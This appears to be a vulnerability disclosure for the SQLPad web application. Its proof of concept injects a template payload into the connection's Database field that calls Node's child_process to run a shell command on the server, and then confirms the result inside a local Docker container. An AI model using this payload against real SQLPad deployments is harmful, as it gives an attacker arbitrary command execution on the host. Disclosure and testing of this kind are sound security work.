Description

Please enter a description of the vulnerability.

Proof of Concept

• Run a local docker instance

sudo docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:latest

• Navigate to http://localhost:3000/
• Click on Connections->Add connection* ChooseMySQL as the driver
• Input the following payload into the Database form field

{{ process.mainModule.require('child_process').exec('id>/tmp/pwn') }}

• Execute the following command to confirm the /tmp/pwn file was created in the container filesystem

sudo docker exec -it sqlpad cat /tmp/pwn

Impact

An SQLPad web application user with admin rights is able to run arbitrary commands in the underlying server.